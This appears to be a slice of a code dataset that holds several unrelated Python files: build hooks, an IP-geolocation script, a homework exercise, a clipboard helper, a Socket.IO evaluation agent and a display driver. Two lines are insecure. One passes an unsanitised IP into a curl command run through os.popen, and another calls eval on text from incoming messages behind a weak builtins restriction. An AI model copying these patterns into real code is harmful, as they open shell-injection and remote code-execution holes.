data is _missing:\n # ensure every function is in our yaml so someone can review it\n if \"parent\" in fn:\n print(\"WARNING:\", fn[\"parent\"][\"name\"], \"method\", fn[\"name\"], \"missing\")\n else:\n print(\"WARNING: function\", fn[\"name\"], \"missing\")\n data = typ()\n # assert False, fn['name']\n elif data is None:\n data = typ()\n\n if getattr(data, \"overloads\", {}):\n _sig = \", \".join(\n p.get(\"enum\", p[\"raw_type\"]) + \"&\" * p[\"reference\"] + \"*\" * p[\"pointer\"]\n for p in fn[\"parameters\"]\n )\n if _sig in data.overloads:\n overload = data.overloads[_sig]\n if overload:\n data = data.to_native()\n data.update(overload.to_native())\n data = typ(data)\n else:\n print(\n \"WARNING: Missing overload %s::%s(%s)\"\n % (fn[\"parent\"][\"name\"], fn[\"name\"], _sig)\n )\n\n # Use this if one of the parameter types don't quite match\n param_override = data.param_override\n\n # fix cppheaderparser quirk\n if len(fn[\"parameters\"]) == 1:\n p = fn[\"parameters\"][0]\n if p[\"type\"] == \"void\" and not p[\"pointer\"]:\n fn[\"parameters\"] = []\n\n # buffers: accepts a python object that supports the buffer protocol\n # as input. If the buffer is an 'out' buffer, then it\n # will request a writeable buffer. Data is written by the\n # wrapped function to that buffer directly, and the length\n # written (if the length is a pointer) will be returned\n buffer_params = {}\n buflen_params = {}\n if data.buffers:\n for bufinfo in data.buffers:\n if bufinfo.src == bufinfo.len:\n raise ValueError(\n f\"buffer src({bufinfo.src}) and len({bufinfo.len}) cannot be the same\"\n )\n buffer_params[bufinfo.src] = bufinfo\n buflen_params[bufinfo.len] = bufinfo\n\n for i, p in enumerate(fn[\"parameters\"]):\n\n if p[\"raw_type\"] in _int32_types:\n p[\"fundamental\"] = True\n p[\"unresolved\"] = False\n\n if p[\"name\"] == \"\":\n p[\"name\"] = \"param%s\" % i\n p[\"x_type\"] = p.get(\"enum\", p[\"raw_type\"])\n p[\"x_callname\"] = p[\"name\"]\n p[\"x_retname\"] = p[\"name\"]\n\n if \"forward_declared\" in p:\n fn[\"forward_declare\"] = True\n if \"parent\" in fn:\n fn[\"parent\"][\"has_fwd_declare\"] = True\n\n po = param_override.get(p[\"name\"])\n if po:\n p.update(po.to_native())\n\n p[\"x_pyarg\"] = 'py::arg(\"%(name)s\")' % p\n\n if \"default\" in p:\n p[\"default\"] = _resolve_default(fn, p[\"default\"])\n p[\"x_pyarg\"] += \"=\" + p[\"default\"]\n\n ptype = \"in\"\n\n bufinfo = buffer_params.pop(p[\"name\"], None)\n buflen = buflen_params.pop(p[\"name\"], None)\n\n if bufinfo:\n x_genlambda = True\n bname = f\"__{bufinfo.src}\"\n p[\"constant\"] = 1\n p[\"reference\"] = 1\n p[\"pointer\"] = 0\n\n p[\"x_callname\"] = f\"({p['x_type']}*){bname}.ptr\"\n p[\"x_type\"] = \"py::buffer\"\n\n # this doesn't seem to be true for bytearrays, which is silly\n # x_lambda_pre.append(\n # f'if (PyBuffer_IsContiguous((Py_buffer*){p[\"name\"]}.ptr(), \\'C\\') == 0) throw py::value_error(\"{p[\"name\"]}: buffer must be contiguous\")'\n # )\n\n # TODO: check for dimensions, strides, other dangerous things\n\n if bufinfo.type == \"in\":\n ptype = \"in\"\n x_lambda_pre += [f\"auto {bname} = {p['name']}.request(false)\"]\n elif bufinfo.type in (\"inout\", \"out\"):\n ptype = \"in\"\n x_lambda_pre += [f\"auto {bname} = {p['name']}.request(true)\"]\n else:\n raise ValueError(\"Invalid bufinfo type %s\" % (bufinfo.type))\n\n x_lambda_pre += [f\"{bufinfo.len} = {bname}.size * {bname}.itemsize\"]\n\n if bufinfo.minsz:\n x_lambda_pre.append(\n f'if ({bufinfo.len} < {bufinfo.minsz}) throw py::value_error(\"{p[\"name\"]}: minimum buffer size is {bufinfo.minsz}\")'\n )\n\n elif buflen:\n if p[\"pointer\"]:\n p[\"x_callname\"] = f\"&{buflen.len}\"\n ptype = \"out\"\n else:\n # if it's not a pointer, then the called function\n # can't communicate through it, so ignore the parameter\n p[\"x_callname\"] = buflen.len\n x_temps.append(p)\n ptype = \"ignored\"\n\n elif p[\"pointer\"] and not p[\"constant\"] and p[\"fundamental\"]:\n p[\"x_callname\"] = \"&%(x_callname)s\" % p\n ptype = \"out\"\n elif p[\"array\"]:\n asz = p.get(\"array_size\", 0)\n if asz:\n p[\"x_type\"] = \"std::array<%s, %s>\" % (p[\"x_type\"], asz)\n p[\"x_callname\"] = \"%(x_callname)s.data()\" % p\n else:\n # it's a vector\n pass\n ptype = \"out\"\n\n if ptype == \"out\":\n x_out_params.append(p)\n x_temps.append(p)\n elif ptype == \"in\":\n x_in_params.append(p)\n\n if p[\"constant\"]:\n p[\"x_type\"] = \"const \" + p[\"x_type\"]\n\n p[\"x_type_full\"] = p[\"x_type\"]\n p[\"x_type_full\"] += \"&\" * p[\"reference\"]\n p[\"x_type_full\"] += \"*\" * p[\"pointer\"]\n\n p[\"x_decl\"] = \"%s %s\" % (p[\"x_type_full\"], p[\"name\"])\n\n if buffer_params:\n raise ValueError(\n \"incorrect buffer param names '%s'\" % (\"', '\".join(buffer_params.keys()))\n )\n\n x_callstart = \"\"\n x_callend = \"\"\n x_wrap_return = \"\"\n\n if x_out_params:\n x_genlambda = True\n\n # Return all out parameters\n x_rets.extend(x_out_params)\n\n if fn[\"rtnType\"] != \"void\":\n x_callstart = \"auto __ret =\"\n x_rets.insert(0, dict(x_retname=\"__ret\", x_type=fn[\"rtnType\"]))\n\n if len(x_rets) == 1 and x_rets[0][\"x_type\"] != \"void\":\n x_wrap_return = \"return %s;\" % x_rets[0][\"x_retname\"]\n elif len(x_rets) > 1:\n x_wrap_return = \"return std::make_tuple(%s);\" % \",\".join(\n [p[\"x_retname\"] for p in x_rets]\n )\n\n # Temporary values to store out parameters in\n if x_temps:\n for out in reversed(x_temps):\n x_lambda_pre.insert(0, \"%(x_type)s %(name)s = 0\" % out)\n\n # Rename internal functions\n if data.internal:\n x_name = \"_\" + x_name\n elif data.rename:\n x_name = data.rename\n elif fn[\"constructor\"]:\n x_name = \"__init__\"\n\n doc = \"\"\n doc_quoted = \"\"\n\n if data.doc is not None:\n doc = data.doc\n elif \"doxygen\" in fn:\n # work around a CppHeaderParser bug\n doc = fn[\"doxygen\"].rpartition(\"*//*\")[2]\n doc = sphinxify.process_raw(doc)\n\n if doc:\n # TODO\n doc = doc.replace(\"\\\\\", \"\\\\\\\\\").replace('\"', '\\\\\"')\n doc_quoted = doc.splitlines(keepends=True)\n doc_quoted = ['\"%s\"' % (dq.replace(\"\\n\", \"\\\\n\"),) for dq in doc_quoted]\n\n # if \"hook\" in data:\n # eval(data[\"hook\"])(fn, data)\n\n # bind new attributes to the function definition\n # -> previously used locals(), but this is more explicit\n # and easier to not mess up\n fn.update(\n dict(\n data=data,\n # transforms\n x_name=x_name,\n x_in_params=x_in_params,\n x_out_params=x_out_params,\n x_rets=x_rets,\n # lambda generation\n x_genlambda=x_genlambda,\n x_callstart=x_callstart,\n x_lambda_pre=x_lambda_pre,\n x_lambda_post=x_lambda_post,\n x_callend=x_callend,\n x_wrap_return=x_wrap_return,\n # docstrings\n x_doc=doc,\n x_doc_quoted=doc_quoted,\n )\n )\n\n\ndef function_hook(fn, data):\n global_data = data.get(\"data\", {})\n functions_data = global_data.functions\n _function_hook(fn, global_data, functions_data, FunctionData)\n\n\ndef class_hook(cls, data):\n\n # work around CppHeaderParser hoisting structs nested in classes to top\n if cls[\"parent\"] is not None:\n cls[\"data\"] = {\"ignore\": True}\n return\n\n global_data = data.get(\"data\", {})\n class_data = global_data.classes.get(cls[\"name\"])\n if class_data is None:\n print(\"WARNING: class\", cls[\"name\"], \"missing\")\n class_data = ClassData()\n\n # fix enum paths\n for e in cls[\"enums\"][\"public\"]:\n e[\"x_namespace\"] = e[\"namespace\"] + \"::\" + cls[\"name\"] + \"::\"\n _enum_hook(e, global_data, global_data.enums)\n\n # update inheritance\n for base in cls[\"inherits\"]:\n if \"::\" not in base[\"class\"]:\n base[\"ns_class\"] = f'{cls[\"namespace\"]}::{base[\"class\"]}'\n else:\n base[\"ns_class\"] = base[\"class\"]\n\n cls[\"data\"] = class_data\n methods_data = class_data.methods\n for fn in cls[\"methods\"][\"public\"]:\n try:\n _function_hook(fn, global_data, methods_data, MethodData)\n except Exception as e:\n raise HookError(f\"{cls['name']}::{fn['name']}\") from e\n","sub_path":"robotpy_build/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":12060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"271868872","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nimport requests\nimport numpy as np\nfrom random import choice,seed\nfrom base64 import b64encode as encode\nfrom base64 import b64decode as decode\nimport os\nhere = os.path.dirname(os.path.realpath(__file__))\nHOME = os.getenv('HOME')\n\nimport logging\nLG = logging.getLogger(__name__)\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\n\nclass profile(object):\n def __init__(self,IP='',hostname='',country='',state='',city='',\n GPS_pos='',dates=[]):\n self.ip = IP\n self.hostname = hostname\n self.country = country\n self.state = state\n self.city = city\n self.coor = GPS_pos\n self.dates = dates\n def __str__(self):\n msg = ' IP: %s\\n'%(self.ip)\n msg += ' hostname: %s\\n'%(self.hostname)\n msg += ' country: %s\\n'%(self.country)\n msg += ' state: %s\\n'%(self.state)\n msg += ' city: %s\\n'%(self.city)\n msg += ' GPS: %s,%s\\n'%(self.coor[0],self.coor[1])\n D = self.dates\n try: msg += ' dates: %s - %s (%s)'%(D[0],D[-1],len(D))\n except IndexError: msg = msg[0:-1]\n return msg\n\nclass myTimeOut(Exception):\n \"\"\" Auxiliary class to handle TimeOut from different libraries \"\"\"\n pass\n\n\ndef analyze_IP(IP,lim=None):\n \"\"\" Randomly chooses a web service to look up the IP information \"\"\"\n funcs = [ip_api,ipapi,ipinfo,tools_keycdn] # Error in tools_keycdn\n if lim == None: lim = len(funcs)\n out,cont = False,0\n while not out or cont < lim:\n seed()\n f = choice(funcs)\n LG.info('Using api: %s for ip: %s'%(f.__name__,IP))\n try:\n resp = f(IP)\n return resp\n except myTimeOut: LG.warning('TimeOutError, try again (%s)'%(cont))\n cont += 1\n return None\n\ndef ipapi(IP,t0=3):\n \"\"\" Use webservice from ipapi.co to get information about an IP \"\"\"\n url = 'https://ipapi.co/%s/json/'%(IP)\n LG.debug(url)\n try: location = requests.get(url, timeout=t0).json()\n except requests.exceptions.Timeout: raise myTimeOut\n hostname = ''\n ## country\n try: country = location['country']\n except: country = ''\n ## city\n try: city = location['city']\n except: city = ''\n ## State\n try: state = location['region']\n except: state = ''\n ## GPS position\n try:\n lat,lon = location['latitude'],location['longitude']\n GPS_pos = (float(lat),float(lon))\n except: GPS_pos = (0,0)\n return profile(IP,str(hostname),str(country),str(state),str(city),GPS_pos)\n\n\ndef ip_api(IP,t0=3):\n \"\"\" Use webservice from ip-api.com to get information about an IP \"\"\"\n url = 'http://ip-api.com/json/%s'%(IP)\n LG.debug(url)\n try: location = requests.get(url, timeout=t0).json()\n except requests.exceptions.Timeout: raise myTimeOut\n ## hostname\n try: hostname = location['hostname']\n except: hostname = ''\n ## country\n try: country = location['country']\n except: country = ''\n ## city\n try: city = location['city']\n except: city = ''\n ## State\n try: state = location['region']\n except: state = ''\n ## GPS position\n try:\n lat,lon = location['lat'],location['lon']\n GPS_pos = (float(lat),float(lon))\n except: GPS_pos = (0,0)\n return profile(IP,str(hostname),str(country),str(state),str(city),GPS_pos)\n\ndef ipinfo(IP,t0=3):\n \"\"\" Use webservice from ipinfo.io to get information about an IP \"\"\"\n url = 'http://ipinfo.io/%s'%(IP)\n LG.debug(url)\n try: location = requests.get(url, timeout=t0).json()\n except requests.exceptions.Timeout: raise myTimeOut\n ## hostname\n try: hostname = location['hostname']\n except: hostname = ''\n ## country\n try: country = location['country']\n except: country = ''\n ## city\n try: city = location['city']\n except: city = ''\n ## State\n try: state = location['region']\n except: state = ''\n ## GPS position\n try:\n aux = location['loc'].split(',')\n GPS_pos = (float(aux[0]),float(aux[1]))\n except: GPS_pos = (0,0)\n return profile(IP,str(hostname),str(country),str(state),str(city),GPS_pos)\n\nimport json\ndef tools_keycdn(IP,t0=3):\n \"\"\" Use webservice from tools.keycdn.com to get information about an IP \"\"\"\n url = 'https://tools.keycdn.com/geo.json?host=%s'%(IP)\n LG.debug(url)\n #try: resp = requests.get(url, timeout=t0).json()\n #except requests.exceptions.Timeout: raise myTimeOut\n resp = os.popen('curl \"%s\"'%(url)).read().lstrip().rstrip()\n resp = json.loads(resp)\n ## hostname\n try: host = resp['data']['geo']['host']\n except: host = ''\n ## country\n try: country = resp['data']['geo']['country_code']\n except: country = ''\n ## city\n try: state = resp['data']['geo']['region']\n except: state = ''\n ## State\n try: city = resp['data']['geo']['city']\n except: city = ''\n ## GPS position\n try:\n lat = resp['data']['geo']['latitude']\n lon = resp['data']['geo']['longitude']\n GPS_pos = (float(lat),float(lon))\n except: GPS_pos = (0,0)\n return profile(IP,host,country,state,city,GPS_pos)\n\n\ndef get_url(markers=[],C_lat=None,C_lon=None,zoom=None,maptype='roadmap',\n S=(600,300),force_path=False):\n \"\"\"\n C_lat,C_lon : Center of the map. if not provided, use the center of\n all markers\n markers: List of markers with format: Marker = (lat,lon,HUE_color)\n zoom: Zoom level (should be a function of the distance between markers)\n S: size of the image\n maptype: Map type, options are: roadmap,terrain,hybrid,satellite\n \"\"\"\n X = [M[0] for M in markers]\n Y = [M[1] for M in markers]\n if zoom != False:\n if len(markers) == 1 or np.mean([np.std(X),np.std(Y)]) < 0.75:\n # If only 1 point, or many points very close one to each other\n # then show a wide area to get an idea of the position (~ city level)\n zoom = 11\n sx,sy = S\n user,key = open('%s/api.private'%(here),'r').read().splitlines()\n key = str(decode(key),'utf-8')\n basic_url = 'https://maps.googleapis.com/maps/api/staticmap?'\n if C_lat!=None and C_lon!=None: basic_url += 'center=%s,%s'%(C_lat,C_lon)\n if zoom != None: basic_url += '&zoom=%s'%(zoom) #XXX make zoom automatic\n if zoom == False: pass\n basic_url += '&size=%sx%s'%(sx,sy)\n basic_url += '&maptype=%s'%(maptype)\n path = '&path=color:0x0000ff|'\n for M in markers:\n path += '%s,%s|'%(M[0],M[1]) # path\n #path += '%s,%s|'%(round(M[0],3),round(M[1],3)) # path\n #mark = '&markers=size:small|color:%s'%(M[2])+'%' #\n try: mark = '&markers=size:small|color:%s'%(M[2])+'%' #\n except IndexError: mark = '&markers=size:small|color:red%%' #\n mark += '7C%s,%s'%(M[0],M[1]) # Markers\n basic_url += mark #\n path = path[0:-1] # remove last pipe\n aux = basic_url + '&key=%s'%(key) + path\n ## add path if possible\n if len(aux) <= 2000 and not force_path: basic_url += path\n basic_url += '&key=%s'%(key)\n if len(basic_url) > 2000: print('WARNING: URL probably too long')\n return basic_url\n\n\ndef get_map(url,fname='map.png'):\n \"\"\" Download map from url \"\"\"\n import urllib\n opener = urllib.request.build_opener() #XXX This will not work\n page = opener.open(url)\n my_picture = page.read()\n fout = open(fname, \"wb\")\n fout.write(my_picture)\n fout.close()\n\n\ndef maps_bike(start,end):\n las,los = start\n lae,loe = end\n user,key = open('%s/api.private'%(here),'r').read().splitlines()\n url = 'https://maps.googleapis.com/maps/api/directions/json?'\n url += 'origin=%s,%s&'%(las,los)\n url += 'destination=%s,%s&'%(lae,loe)\n url += 'mode=bicycling&key=%s'%(key)\n return url\n\ndef get_time(start,end):\n aux = urllib.request.urlopen(maps_bike(start,end)).read().decode('utf-8')\n data = json.loads(aux)\n ds = []\n for R in data['routes']:\n for l in R['legs']:\n ds.append( float(l['duration']['text'].split()[0]) )\n return min(ds)\n\n\n\nif __name__ == \"__main__\":\n import logging\n #import log_help\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)s:%(levelname)s - %(message)s',\n datefmt='%Y/%m/%d-%H:%M:%S',\n filename='geoip.log', filemode='w')\n LG = logging.getLogger('main')\n #log_help.screen_handler(LG)\n\n import argparse\n ## Get the options\n parser = argparse.ArgumentParser(description='Get Information about IP addresses')\n help_msg = 'Obtain a google maps url'\n parser.add_argument('-url',action='store_true', default=True, help=help_msg)\n help_msg = 'Download the map'\n parser.add_argument('-m',action='store_true',default=False, help=help_msg)\n parser.add_argument('IPs', nargs='*')\n args = parser.parse_args()\n\n ## Do the analysis\n coors = []\n for ip in args.IPs:\n IP = analyze_IP(ip)\n print(str(IP)+'\\n') \n coors.append(IP.coor)\n if args.url: print(get_url(markers=coors))\n if args.m: get_map(get_url(markers=coors))\n","sub_path":"geoip.py","file_name":"geoip.py","file_ext":"py","file_size_in_byte":9058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"415947123","text":"\"\"\"\nЗадание 3.\n\nДля этой задачи:\n1) придумайте 1-3 решения (желательно хотя бы два)\n2) оцените сложность каждого решения в нотации О-большое\n3) сделайте вывод, какое решение эффективнее и почему\n\nПримечание:\nБез выполнения пунктов 2 и 3 задание считается нерешенным. Пункты 2 и 3 можно выполнить\nчерез строки документации в самом коде.\nЕсли у вас возникают сложности, постарайтесь подумать как можно решить задачу,\nа не писать \"мы это не проходили)\".\nАлгоритмизатор должен развивать мышление, а это прежде всего практика.\nА без столкновения со сложностями его не развить.\n\n\nСама задача:\nИмеется хранилище с информацией о компаниях: название и годовая прибыль.\nДля реализации хранилища можно применить любой подход,\nкоторый вы придумаете, например, реализовать словарь.\nРеализуйте поиск трех компаний с наибольшей годовой прибылью.\nВыведите результат.\n\"\"\"\n\nimport random\nimport operator\n\ncompanies = {\"Company1\": round(random.uniform(10000, 500000), 2),\n \"Company2\": round(random.uniform(10000, 500000), 2),\n \"Company3\": round(random.uniform(10000, 500000), 2),\n \"Company4\": round(random.uniform(10000, 500000), 2),\n \"Company5\": round(random.uniform(10000, 500000), 2),\n \"Company6\": round(random.uniform(10000, 500000), 2),\n \"Company7\": round(random.uniform(10000, 500000), 2)\n }\n\n\n# Этот вариант самый эффективный\n# только одна дорогостоящая операция поиска max в словаре.\n# предполагаю, что сложность внутри функции max O(n). Не нашел в таблице\n# Итовая сложность O (3N)\ndef profit1(company_profit_dict):\n pass\n my_profit_dict = dict(company_profit_dict) # O(1)\n result_profit_list = [] # O(1)\n print(company_profit_dict)\n for _ in range(3): # O (3)\n maxprofit_company = max(my_profit_dict.items(), key=operator.itemgetter(1))[0] # O(N)\n result_profit_list.append(maxprofit_company) # O(1)\n my_profit_dict.pop(maxprofit_company) # O(1)\n return result_profit_list\n\n\n# Итоговая сложность O(3N + N^2)\ndef profit_2(company_profit_dict):\n profit_storage = []\n for _ in range(3):\n max_profit = 0\n for val in company_profit_dict.values():\n if val > max_profit and val not in profit_storage:\n max_profit = val\n profit_storage.append(max_profit)\n\n for key in company_profit_dict.keys():\n for i in profit_storage:\n if company_profit_dict[key] == i:\n print(f'{key}, {company_profit_dict[key]}')\n\n\nres1 = profit1(companies)\nprint(res1)\n","sub_path":"Урок 1. Практическое задание/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"96056018","text":"#!/usr/bin/env python\n\n# For details, in Mac OS X Terminal type: man pbcopy\n\nimport subprocess, sys\n\ndef getClipboardData(): # Only works for data types: {txt | rtf | ps}\n p = subprocess.Popen(['pbpaste'], stdout=subprocess.PIPE)\n retcode = p.wait()\n data = p.stdout.read()\n return data\n\ndef setClipboardData(data):\n p = subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE)\n p.stdin.write(data)\n p.stdin.close()\n retcode = p.wait()\n\ndef sendTextToiOS(inText):\n pass # Your Prowl code goes here!!!\n\ndef main(argv):\n theText = getClipboardData()\n if not theText:\n print('No text found on the Mac OS X Pasteboard.')\n return -1 # signal error\n print('Got: ' + theText)\n sendTextToiOS(theText)\n return 0 # noError\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))","sub_path":"all-gists/6203459/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"152495289","text":"from uuid import uuid4\nimport time\nimport inspect\nimport os\n\nimport Executables\nfrom SwergioUtility.SocketIOClient import SocketIOClient\nfrom SwergioUtility.MessageUtility import MessageInterface\nfrom SwergioUtility.Settings import getBasicSettings\n\nclass PythonEvaluation():\n def __init__ (self, custom_settings_path = None):\n self._socketIONamespaces = ['PythonEvaluation']\n self._socketIOSenderID = uuid4()\n self._socketIOClient = SocketIOClient(self._socketIONamespaces)\n\n self.safe_list = inspect.getmembers(Executables,inspect.isfunction)\n self.safe_dict = dict(self.safe_list)\n\n self.exec_reward = os.getenv('EXEC_REWARD') or -1\n self.error_reward = os.getenv('ERROR_REWARD') or -10\n self.canthandle_reward = os.getenv('CANTHANDLE_REWARD') or -50\n\n custom_settings_path = custom_settings_path or os.getenv('CUSTOM_SETTINGS_PATH')\n\n max_length_message_text, self.MessageTypeEnum = getBasicSettings(custom_settings_path)\n \n def On_PythonEvaluation_Message(self,data):\n msg = MessageInterface.from_document(data)\n comID = msg.CommunicationID\n doAction = True\n if msg.SenderID != str(self._socketIOSenderID):\n if self.MessageTypeEnum[msg.MessageType] == self.MessageTypeEnum.QUESTION:\n command = msg.Data\n self.act(command,comID)\n else:\n self.canthandle(comID)\n\n def ListenToSocketIO(self):\n self._socketIOHandler = [self.On_PythonEvaluation_Message]\n self._socketIOClient.listen(self._socketIOHandler)\n\n def act(self,command,CommunicationID):\n try:\n result = eval(command, {\"__builtins__\" : None }, self.safe_dict)\n if result != str:\n result = str(result)\n reward = self.exec_reward\n except:\n result = 'error'\n reward = self.error_reward\n\n self.emitObservation(result,reward, False, CommunicationID)\n\n def canthandle(self,comID):\n ob = '?'\n reward = self.canthandle_reward\n self.emitObservation(ob,reward,False,comID)\n\n def emitObservation(self,result,reward, done,CommunicationID):\n msgTyp = self.MessageTypeEnum.ANSWER.name\n namespace = self._socketIONamespaces[0]\n if type(result) != str:\n if type(result) == int:\n result = str(result)\n else:\n result = str(list(result))\n Message = MessageInterface(namespace,self._socketIOSenderID, msgTyp,CommunicationID,Data = result, Reward = reward, DoneFlag = done)\n self._socketIOClient.emit(Message,namespace) \n ","sub_path":"pythonEvaluation.py","file_name":"pythonEvaluation.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"512814049","text":"import time\nfrom pathlib import Path\nfrom datetime import datetime, timedelta\nfrom PIL import ImageFont\n\nfrom luma.core.render import canvas\nimport luma\n\nfrom pins import *\n\n\nclass Dispmod():\n ''' Class for Display\n '''\n\n def __init__(self, Main):\n self.Main = Main\n self.disp_timeout = 20\n self.disp_timeout_night = 5\n self.activity_timeout = 300\n self.disp_mode = 2 # 0 = off, 1 = menu, 2 = big time, 3 = alarm\n self.disp_update = True\n self.s_font, self.m_font, self.b_font = [\n make_font(\"Roboto-Bold.ttf\", sz) for sz in [16, 24, 40]]\n self.awe_font = make_font(\"Font_Awesome_Regular.otf\", 16)\n self.awe_b_font = make_font(\"Font_Awesome_Solid.otf\", 16)\n\n self.y_topbar_size = 16\n self.menu_text = \"Hallo :)\"\n self.update()\n\n def update(self):\n '''If there is something to update it will do so.\n Updates at least every 10s.\n After the timeout display will go in fullscreen mode.\n '''\n if self.disp_update:\n self.month, self.mday, self.h, self.m, self.s, self.wday = [\n time.localtime()[i] for i in range(1, 7)]\n if self.m < 10: # min has allways 2 digits\n self.m = \"0\" + str(self.m)\n\n self.set_menu_text()\n self.last_update = time.time()\n try:\n self.show()\n except OSError as e:\n print(e)\n print(\"ERROR while show()\")\n self.disp_update = True\n except luma.core.error.DeviceNotFoundError as e:\n print(e)\n print(\"ERROR while show()\")\n self.disp_update = True\n\n elif self.last_update <= time.time() - 10: # update at least every 10s\n self.disp_update = True\n\n if self.Main.menu_mode == \"Main\":\n if self.Main.last_activity <= time.time() - self.disp_timeout:\n # after timeout change in fullscreen mode\n self.set_disp_mode(2)\n self.Main.menu_mode = \"full_screen\"\n\n elif self.Main.menu_mode == \"full_screen\":\n if self.Main.last_activity <= time.time() - self.activity_timeout:\n print(\"Activity timeout: --> night\")\n self.Main.menu_mode = \"night\"\n self.set_disp_mode(0)\n\n elif self.Main.menu_mode == \"night\":\n if self.Main.last_activity <= time.time() - self.disp_timeout_night:\n # after night timeout turn back off\n self.set_disp_mode(0)\n\n def show(self):\n with canvas(disp) as draw:\n # draw = PIL.ImageDraw.Draw().Draw\n if self.disp_mode == 0: # off\n pass\n\n # -----Standard menu text-----\n elif self.disp_mode == 1:\n\n self.build_topbar(draw)\n\n # choose appropriate fontsize, wrap text if necessary\n menu_font = self.m_font\n if draw.textsize(self.menu_text, menu_font)[0] > dispWidth:\n self.menu_text = self.menu_text.replace(\" \", \"\\n\", 1)\n if (draw.textsize(self.menu_text, menu_font)[0] > dispWidth\n or draw.textsize(self.menu_text, menu_font)[1] >\n dispWidth - self.y_topbar_size):\n menu_font = self.s_font\n y_m_text = (\n dispHight + self.y_topbar_size\n - draw.textsize(self.menu_text, menu_font)[1]) / 2\n x_m_text = (\n dispWidth - draw.textsize(self.menu_text, menu_font)[0]) / 2\n\n draw.text((x_m_text, y_m_text),\n self.menu_text, \"white\", menu_font, align=\"center\")\n\n # -----show only clock in big-----\n elif self.disp_mode == 2:\n\n clock_text = \"{} : {}\".format(self.h, self.m)\n x_clock = (\n dispWidth - draw.textsize(clock_text, self.b_font)[0]) / 2\n y_clock = (\n dispHight - draw.textsize(clock_text, self.b_font)[1]) / 2\n draw.text((x_clock, y_clock), clock_text, \"white\", self.b_font)\n\n if self.Main.ringing:\n ring_text = \"Beenden mit'Zurück'\"\n x = (dispWidth -\n draw.textsize(ring_text, self.s_font)[0]) / 2\n y = dispHight - draw.textsize(ring_text, self.s_font)[1]\n draw.text((x, y), ring_text, \"white\", self.s_font)\n\n # -----multiline text, used for alarms-----\n elif self.disp_mode == 3:\n disp_list = self.Main.Alarm.get_disp_list()\n\n self.build_topbar(draw)\n\n for line_nr, alarm in enumerate(disp_list):\n alarm_txt = alarm.get_a_datetime().strftime(\"%H:%M\")\n if alarm.get_selected(): # selected?\n sel_txt = \"\\uf061\"\n else:\n sel_txt = \"\"\n\n if alarm.get_armed24(): # active?\n active_txt = \"\\uf0f3\"\n else:\n active_txt = \"\\uf1f6\"\n\n x_sel = 0\n x_alarm = 24\n x_active = dispWidth - 24\n y = self.y_topbar_size + (line_nr * 16)\n\n draw.text((x_sel, y), sel_txt, \"white\", self.awe_b_font)\n draw.text((x_alarm, y), alarm_txt, \"white\", self.s_font)\n draw.text((x_active, y), active_txt,\n \"white\", self.awe_font)\n\n # -----setup alarm-----\n elif self.disp_mode == 4:\n self.build_topbar(draw)\n mod_alarm = self.Main.Alarm.mod_alarm\n\n y_1, y_2, y_3 = [(i+1)*self.y_topbar_size for i in range(3)]\n\n if mod_alarm.mod_part == \"h\":\n date = mod_alarm.a_datetime\n above = (date + timedelta(hours=-1)).strftime(\"%H\")\n text = date.strftime(\"%H:%M\")\n below = (date + timedelta(hours=+1)).strftime(\"%H\")\n\n x_0 = (\n dispWidth - draw.textsize(text, self.s_font)[0]) / 2\n x_1 = x_0\n x_2 = (x_1 + draw.textsize(above, self.s_font)[0])\n\n elif mod_alarm.mod_part == \"min\":\n date = mod_alarm.a_datetime\n above = (date + timedelta(minutes=-1)).strftime(\"%M\")\n text = date.strftime(\"%H:%M\")\n below = (date + timedelta(minutes=+1)).strftime(\"%M\")\n\n hour = (date + timedelta(minutes=+1)).strftime(\"%H:\")\n\n x_0 = (\n dispWidth - draw.textsize(text, self.s_font)[0]) / 2\n x_1 = x_0 + draw.textsize(hour, self.s_font)[0]\n x_2 = x_0 + draw.textsize(text, self.s_font)[0]\n\n if mod_alarm.mod_part in [\"h\", \"min\"]:\n draw.rectangle(\n [(x_1-1, y_2+1), (x_2+1, y_3-1)], outline=\"white\")\n draw.text((x_1, y_1), above, \"white\", self.s_font)\n draw.text((x_0, y_2), text, \"white\", self.s_font)\n draw.text((x_1, y_3), below, \"white\", self.s_font)\n\n elif mod_alarm.mod_part == \"sound\":\n sel = self.Main.Alarm.sound_selected\n sounds = self.Main.Speakers.sounds_list\n x = 3\n text = sounds[sel]\n if sel-1 < 0:\n above = \"\"\n else:\n above = sounds[sel-1]\n if sel+1 > len(sounds)-1:\n below = \"\"\n else:\n below = sounds[sel+1]\n\n draw.text((x, y_1), above, \"white\", self.s_font)\n draw.text((x, y_2), text, \"white\", self.s_font)\n draw.text((x, y_3), below, \"white\", self.s_font)\n\n elif mod_alarm.mod_part == \"light\":\n sel = self.Main.Alarm.light_selected\n lights = self.Main.Alarm.light_opt\n x = 3\n text = lights[sel]\n if sel-1 < 0:\n above = \"\"\n else:\n above = lights[sel-1]\n if sel+1 > len(lights)-1:\n below = \"\"\n else:\n below = lights[sel+1]\n\n draw.text((x, y_1), above, \"white\", self.s_font)\n draw.text((x, y_2), text, \"white\", self.s_font)\n draw.text((x, y_3), below, \"white\", self.s_font)\n\n elif mod_alarm.mod_part == \"light_delay\":\n delay = self.Main.Alarm.light_delay\n text = str(delay)\n if delay-1 < 0:\n above = \"\"\n else:\n above = str(delay-1)\n if delay+1 > 30:\n below = \"\"\n else:\n below = str(delay+1)\n\n x = (dispWidth -\n draw.textsize(str(delay), self.s_font)[0]) / 2\n\n draw.text((x, y_1), above, \"white\", self.s_font)\n draw.text((x, y_2), text, \"white\", self.s_font)\n draw.text((x, y_3), below, \"white\", self.s_font)\n\n def 